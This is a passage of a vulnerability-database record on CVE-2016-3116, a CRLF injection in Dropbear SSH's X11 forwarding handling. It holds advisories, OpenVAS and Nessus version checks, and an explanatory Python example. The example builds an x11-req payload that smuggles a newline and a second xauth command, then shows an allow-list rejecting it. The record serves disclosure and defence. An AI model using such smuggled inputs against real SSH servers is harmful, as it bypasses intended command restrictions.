ID: FEDORA:3F1086090E78  Type: fedora  Reporter: Fedora  Modified: 2016-03-24T00:05:17
Description
Dropbear is a relatively small SSH server and client. It's particularly useful for "embedded"-type Linux (or other Unix) systems, such as wireless routers. This update addresses CVE-2016-3116: Dropbear before 2016.72 did not validate X11 forwarding input, so a remote authenticated user, including one confined by an authorized_keys command= entry, could inject additional commands into the data the server hands to xauth and bypass the intended shell-command restriction.
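The bulletin data below describes CVE-2016-3116 only as "X11 forwarding input not validated properly" and "inject commands to xauth". The mechanism is a CRLF injection: in the SSH "x11-req" channel request (RFC 4254 section 6.3.1) the client supplies the X11 authentication protocol name and cookie as free-form strings, and a server that splices them into the line-oriented command stream it feeds to xauth without checking them lets an authenticated client append its own xauth commands. Because x11-req is a channel request handled independently of the forced command, an authorized_keys command= restriction does not stop it. The Python below is an added example, not Dropbear's code: it builds and parses that payload, renders the xauth script without validation (the pre-2016.72 behaviour the advisories describe) and with an allow-list check of the kind the fix introduced. Assumptions are the one-line `add <display> <proto> <cookie>` script shape, the exact allow-lists (letters, digits and `-_.:` for the protocol name; hex digits for the cookie, which RFC 4254 requires to be hex encoded) and the constructed sample payloads.

```python
import re
import struct

# Payload of an SSH "x11-req" channel request (RFC 4254 section 6.3.1),
# after the recipient channel, request type and want-reply fields:
#   boolean  single connection
#   string   x11 authentication protocol   (e.g. "MIT-MAGIC-COOKIE-1")
#   string   x11 authentication cookie     (RFC 4254: MUST be hex encoded)
#   uint32   x11 screen number


def _put_string(b: bytes) -> bytes:
    """SSH 'string': uint32 big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def _get_string(buf: bytes, off: int):
    """Read an SSH 'string' at offset off; return (value, new offset)."""
    if off + 4 > len(buf):
        raise ValueError("truncated length field")
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    if off + n > len(buf):
        raise ValueError("truncated SSH string")
    return buf[off:off + n], off + n


def build_x11_req(single: bool, proto: str, cookie: str, screen: int) -> bytes:
    """Encode an x11-req payload as an SSH client would send it."""
    return (bytes([1 if single else 0])
            + _put_string(proto.encode("latin-1"))
            + _put_string(cookie.encode("latin-1"))
            + struct.pack(">I", screen))


def parse_x11_req(payload: bytes) -> dict:
    """Decode an x11-req payload. latin-1 keeps every byte, including CR/LF,
    so the validator sees exactly what the client sent."""
    if not payload:
        raise ValueError("empty payload")
    proto, off = _get_string(payload, 1)
    cookie, off = _get_string(payload, off)
    if off + 4 != len(payload):
        raise ValueError("bad trailing data")
    (screen,) = struct.unpack_from(">I", payload, off)
    return {"single": payload[0] != 0,
            "proto": proto.decode("latin-1"),
            "cookie": cookie.decode("latin-1"),
            "screen": screen}


# Allow-lists (this example's choice, modelled on the kind of check the
# 2016.72 fix added): nothing that could terminate or split an xauth
# command line survives these patterns.
AUTH_PROTO_RE = re.compile(r"[A-Za-z0-9_.:-]{1,64}")
COOKIE_RE = re.compile(r"[0-9A-Fa-f]{1,256}")


def x11_req_is_valid(req: dict) -> bool:
    return (AUTH_PROTO_RE.fullmatch(req["proto"]) is not None
            and COOKIE_RE.fullmatch(req["cookie"]) is not None)


def xauth_script(req: dict, display: str, validate: bool = True) -> str:
    """Render the line-oriented script the server hands to `xauth` on stdin
    (assumed shape: one 'add <display> <proto> <cookie>' line).
    validate=False reproduces the pre-2016.72 behaviour: the client's
    strings are spliced in untouched."""
    if validate and not x11_req_is_valid(req):
        raise ValueError("x11-req rejected: invalid auth protocol or cookie")
    return f"add {display} {req['proto']} {req['cookie']}\n"


def xauth_commands(script: str) -> list:
    """The separate commands xauth would execute from a rendered script."""
    return [line for line in script.replace("\r", "\n").split("\n") if line.strip()]


if __name__ == "__main__":
    display = "unix:10.0"
    # Constructed payloads: a normal request, and one whose cookie smuggles
    # a newline plus a second xauth command ("list" is only a marker here).
    requests = {
        "normal": build_x11_req(False, "MIT-MAGIC-COOKIE-1", "00" * 16, 0),
        "injected": build_x11_req(False, "MIT-MAGIC-COOKIE-1", "00" * 16 + "\nlist", 0),
    }
    for name, payload in requests.items():
        req = parse_x11_req(payload)
        print(name, "unvalidated ->",
              xauth_commands(xauth_script(req, display, validate=False)))
        try:
            xauth_script(req, display)
            print(name, "validated   -> accepted")
        except ValueError as err:
            print(name, "validated   ->", err)
```

Run it directly to see both renderings: the unvalidated path turns the injected cookie into two xauth commands, the validated path refuses the request before any xauth process would be spawned. The point to carry over to other code is that a server must apply the allow-list to the raw strings from the wire, not to a re-quoted or trimmed copy, because xauth reads its commands line by line and any CR or LF that reaches it starts a new command.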
{"cve": [{"lastseen": "2021-02-02T06:28:05", "description": "CRLF injection vulnerability in Dropbear SSH before 2016.72 allows remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data.\n<a href=\"https://cwe.mitre.org/data/definitions/93.html\">CWE-93: Improper Neutralization of CRLF Sequences ('CRLF Injection')</a>", "edition": 6, "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.4, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-03-22T10:59:00", "title": "CVE-2016-3116", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3116"], "modified": "2016-12-03T03:26:00", "cpe": ["cpe:/a:dropbear_ssh_project:dropbear_ssh:2015.71"], "id": "CVE-2016-3116", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3116", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:dropbear_ssh_project:dropbear_ssh:2015.71:*:*:*:*:*:*:*"]}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3116"], "description": "Dropbear is a relatively small SSH server and client. 
It's particularly use ful for \"embedded\"-type Linux (or other Unix) systems, such as wireless routers. ", "modified": "2016-03-23T22:29:21", "published": "2016-03-23T22:29:21", "id": "FEDORA:E5E60608F463", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: dropbear-2016.72-1.fc23", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3116"], "description": "Dropbear is a relatively small SSH server and client. It's particularly use ful for \"embedded\"-type Linux (or other Unix) systems, such as wireless routers. ", "modified": "2016-03-27T00:49:06", "published": "2016-03-27T00:49:06", "id": "FEDORA:B8CC460AA79C", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: dropbear-2016.72-1.fc24", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3116"], "description": "\nMatt Johnson reports:\n\nValidate X11 forwarding input. 
Could allow bypass of\n\t authorized_keys command= restrictions\n\n", "edition": 4, "modified": "2016-03-11T00:00:00", "published": "2016-03-11T00:00:00", "id": "8EB78CDC-E9EC-11E5-85BE-14DAE9D210B8", "href": "https://vuxml.freebsd.org/freebsd/8eb78cdc-e9ec-11e5-85be-14dae9d210b8.html", "title": "dropbear -- authorized_keys command= bypass", "type": "freebsd", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:35:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-03-24T00:00:00", "id": "OPENVAS:1361412562310807729", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807729", "type": "openvas", "title": "Fedora Update for dropbear FEDORA-2016-332491", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for dropbear FEDORA-2016-332491\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807729\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-24 06:14:24 +0100 (Thu, 24 Mar 2016)\");\n script_cve_id(\"CVE-2016-3116\");\n script_tag(name:\"cvss_base\", value:\"5.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for dropbear FEDORA-2016-332491\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'dropbear'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"dropbear on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-332491\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179261.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"dropbear\", rpm:\"dropbear~2016.72~1.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-03-24T00:00:00", "id": "OPENVAS:1361412562310807732", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807732", "type": "openvas", "title": "Fedora Update for dropbear FEDORA-2016-40", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for dropbear FEDORA-2016-40\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807732\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-24 06:14:25 +0100 (Thu, 24 Mar 2016)\");\n script_cve_id(\"CVE-2016-3116\");\n script_tag(name:\"cvss_base\", value:\"5.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for dropbear FEDORA-2016-40\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'dropbear'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"dropbear on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-40\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179269.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"dropbear\", rpm:\"dropbear~2016.72~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "description": "Mageia Linux Local Security Checks mgasa-2016-0113", "modified": "2019-03-14T00:00:00", "published": "2016-03-17T00:00:00", "id": "OPENVAS:1361412562310131270", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131270", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0113", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0113.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131270\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-03-17 16:02:33 +0200 (Thu, 17 Mar 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0113\");\n script_tag(name:\"insight\", value:\"Updated dropbear package fixes security vulnerability: Missing validation of X11 forwarding input could allow bypassing of authorized_keys command= restrictions (CVE-2016-3116).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0113.html\");\n script_cve_id(\"CVE-2016-3116\");\n script_tag(name:\"cvss_base\", value:\"5.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0113\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif 
((res = isrpmvuln(pkg:\"dropbear\", rpm:\"dropbear~2014.66~1.1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2020-03-10T18:56:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "description": "This host is installed with Dropbear SSH\n and is prone to crlf injection vulnerability.", "modified": "2020-03-09T00:00:00", "published": "2016-04-06T00:00:00", "id": "OPENVAS:1361412562310807740", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807740", "type": "openvas", "title": "Dropbear SSH CRLF Injection Vulnerability", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:dropbear_ssh_project:dropbear_ssh\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807740\");\n script_version(\"2020-03-09T10:54:00+0000\");\n script_cve_id(\"CVE-2016-3116\");\n script_tag(name:\"cvss_base\", value:\"5.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-03-09 10:54:00 +0000 (Mon, 09 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-04-06 16:24:50 +0530 (Wed, 06 Apr 2016)\");\n script_name(\"Dropbear SSH CRLF Injection Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Dropbear SSH\n and is prone to crlf injection vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to invalid processing\n of 'X11' forwarding input.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allow\n remote authenticated users to inject commands to xauth..\");\n\n script_tag(name:\"affected\", value:\"Dropbear SSH before 2016.72\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Dropbear SSH version 2016.72 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"https://matt.ucc.asn.au/dropbear/CHANGES\");\n script_xref(name:\"URL\", value:\"https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3116\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n 
script_dependencies(\"gb_dropbear_ssh_detect.nasl\");\n script_mandatory_keys(\"dropbear/installed\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!sshPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!sshVer = get_app_version(cpe:CPE, port:sshPort)){\n exit(0);\n}\n\nif(version_is_less(version:sshVer, test_version:\"2016.72\"))\n{\n report = report_fixed_ver(installed_version:sshVer, fixed_version:\"2016.72\");\n security_message(port:sshPort, data:report);\n exit(0);\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:20", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3116"], "description": "### Background\n\nDropbear is a relatively small SSH server and client.\n\n### Description\n\nA CRLF injection vulnerability in Dropbear SSH allows remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data. \n\n### Impact\n\nA remote authenticated user could execute arbitrary code with the privileges of the process. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Dropbear users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/dropbear-2016.73\"", "edition": 1, "modified": "2016-07-20T00:00:00", "published": "2016-07-20T00:00:00", "id": "GLSA-201607-08", "href": "https://security.gentoo.org/glsa/201607-08", "type": "gentoo", "title": "Dropbear: Privilege escalation", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2021-01-12T10:14:23", "description": "new version\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-08-02T00:00:00", "title": "Fedora 23 : dropbear (2016-6de0b19b3b)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "modified": "2016-08-02T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:dropbear", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-6DE0B19B3B.NASL", "href": "https://www.tenable.com/plugins/nessus/92670", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-6de0b19b3b.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92670);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3116\");\n script_xref(name:\"FEDORA\", value:\"2016-6de0b19b3b\");\n\n script_name(english:\"Fedora 23 : dropbear (2016-6de0b19b3b)\");\n script_summary(english:\"Checks 
rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"new version\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-6de0b19b3b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dropbear package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:dropbear\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"dropbear-2016.74-1.fc23\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dropbear\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-12T10:14:06", "description": "CVE-2016-3116 dropbear: X11 forwarding input not validated properly\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-24T00:00:00", "title": "Fedora 23 : dropbear-2016.72-1.fc23 (2016-332491de28)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "modified": "2016-03-24T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:dropbear", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-332491DE28.NASL", "href": "https://www.tenable.com/plugins/nessus/90129", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-332491de28.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90129);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3116\");\n script_xref(name:\"FEDORA\", value:\"2016-332491de28\");\n\n script_name(english:\"Fedora 23 : dropbear-2016.72-1.fc23 (2016-332491de28)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2016-3116 dropbear: X11 forwarding input not validated properly\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
